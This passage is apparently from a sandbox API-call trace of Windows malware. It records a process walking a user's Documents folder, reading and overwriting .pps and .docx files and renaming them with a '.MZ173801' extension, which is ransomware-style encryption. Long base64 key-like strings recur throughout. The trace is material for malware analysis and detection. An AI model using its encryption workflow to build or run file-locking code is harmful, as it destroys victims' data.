dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x2458 [0121.925] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0121.925] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2458, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x2458, lpOverlapped=0x0) returned 1 [0121.926] CloseHandle (hObject=0x3d0) returned 1 [0121.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\9JNTT48UjoH.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\9jntt48ujoh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0121.927] WriteFile (in: hFile=0x3d0, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x2458, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f6f0*=0x2458, lpOverlapped=0x0) returned 1 [0121.928] CloseHandle (hObject=0x3d0) returned 1 [0121.929] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\9JNTT48UjoH.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\9jntt48ujoh.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\9JNTT48UjoH.pps.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\9jntt48ujoh.pps.mz173801")) returned 1 [0122.003] GetCurrentThreadId () returned 0x1358 [0122.003] GetCurrentThreadId () returned 0x1358 [0122.003] GetCurrentThreadId () returned 0x1358 [0122.003] GetCurrentThreadId () returned 0x1358 [0122.003] GetCurrentThreadId () returned 0x1358 [0122.003] GetCurrentThreadId () returned 0x1358 [0122.003] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecdfdf50, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0x2d4788a0, ftLastAccessTime.dwHighDateTime=0x1d5eee2, ftLastWriteTime.dwLowDateTime=0x2d4788a0, ftLastWriteTime.dwHighDateTime=0x1d5eee2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="dQSfhEFRy_gFg", cAlternateFileName="DQSFHE~1")) returned 1 [0122.003] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4ec030, ftCreationTime.dwHighDateTime=0x1d5e95b, ftLastAccessTime.dwLowDateTime=0x625f29e0, ftLastAccessTime.dwHighDateTime=0x1d5e5db, ftLastWriteTime.dwLowDateTime=0x625f29e0, ftLastWriteTime.dwHighDateTime=0x1d5e5db, nFileSizeHigh=0x0, nFileSizeLow=0xabaa, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="E5xn1.ots", cAlternateFileName="")) returned 1 [0122.003] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.003] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.003] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d338120, ftCreationTime.dwHighDateTime=0x1d5ee42, ftLastAccessTime.dwLowDateTime=0x175d0bf0, ftLastAccessTime.dwHighDateTime=0x1d5ea1e, ftLastWriteTime.dwLowDateTime=0x175d0bf0, ftLastWriteTime.dwHighDateTime=0x1d5ea1e, nFileSizeHigh=0x0, nFileSizeLow=0x17e1a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="KL4cEqDQZvlWYISl9.docx", cAlternateFileName="KL4CEQ~1.DOC")) returned 1 [0122.003] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.003] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\KL4cEqDQZvlWYISl9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\kl4ceqdqzvlwyisl9.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d338120, ftCreationTime.dwHighDateTime=0x1d5ee42, ftLastAccessTime.dwLowDateTime=0x175d0bf0, ftLastAccessTime.dwHighDateTime=0x1d5ea1e, ftLastWriteTime.dwLowDateTime=0x175d0bf0, ftLastWriteTime.dwHighDateTime=0x1d5ea1e, nFileSizeHigh=0x0, nFileSizeLow=0x17e1a)) returned 1 [0122.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.004] GetCurrentThreadId () returned 0x1358 [0122.004] GetCurrentThreadId () returned 0x1358 [0122.004] GetCurrentThreadId () returned 0x1358 [0122.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.004] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.005] GetCurrentThreadId () returned 0x1358 [0122.005] GetCurrentThreadId () returned 0x1358 [0122.005] GetCurrentThreadId () returned 0x1358 [0122.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\KL4cEqDQZvlWYISl9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\kl4ceqdqzvlwyisl9.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0122.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x17e1a [0122.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.005] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17e1a, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x17e1a, lpOverlapped=0x0) returned 1 [0122.007] CloseHandle (hObject=0x3d0) returned 1 [0122.009] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\KL4cEqDQZvlWYISl9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\kl4ceqdqzvlwyisl9.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.011] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x17e1a, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x17e1a, lpOverlapped=0x0) returned 1 [0122.016] CloseHandle (hObject=0x3d0) returned 1 [0122.019] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\KL4cEqDQZvlWYISl9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\kl4ceqdqzvlwyisl9.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\KL4cEqDQZvlWYISl9.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\kl4ceqdqzvlwyisl9.docx.mz173801")) returned 1 [0122.019] GetCurrentThreadId () returned 0x1358 [0122.019] GetCurrentThreadId () returned 0x1358 [0122.020] GetCurrentThreadId () returned 0x1358 [0122.020] GetCurrentThreadId () returned 0x1358 [0122.020] GetCurrentThreadId () returned 0x1358 [0122.020] GetCurrentThreadId () returned 0x1358 [0122.020] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07b45b0, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x1f7cb140, ftLastAccessTime.dwHighDateTime=0x1d5e62d, ftLastWriteTime.dwLowDateTime=0x1f7cb140, ftLastWriteTime.dwHighDateTime=0x1d5e62d, nFileSizeHigh=0x0, nFileSizeLow=0xa1b, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="MRdmd02KMM5JtOIVQ.docx", cAlternateFileName="MRDMD0~1.DOC")) returned 1 [0122.020] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.020] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.020] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\MRdmd02KMM5JtOIVQ.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\mrdmd02kmm5jtoivq.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07b45b0, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x1f7cb140, ftLastAccessTime.dwHighDateTime=0x1d5e62d, ftLastWriteTime.dwLowDateTime=0x1f7cb140, ftLastWriteTime.dwHighDateTime=0x1d5e62d, nFileSizeHigh=0x0, nFileSizeLow=0xa1b)) returned 1 [0122.020] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.020] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.021] GetCurrentThreadId () returned 0x1358 [0122.021] GetCurrentThreadId () returned 0x1358 [0122.021] GetCurrentThreadId () returned 0x1358 [0122.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 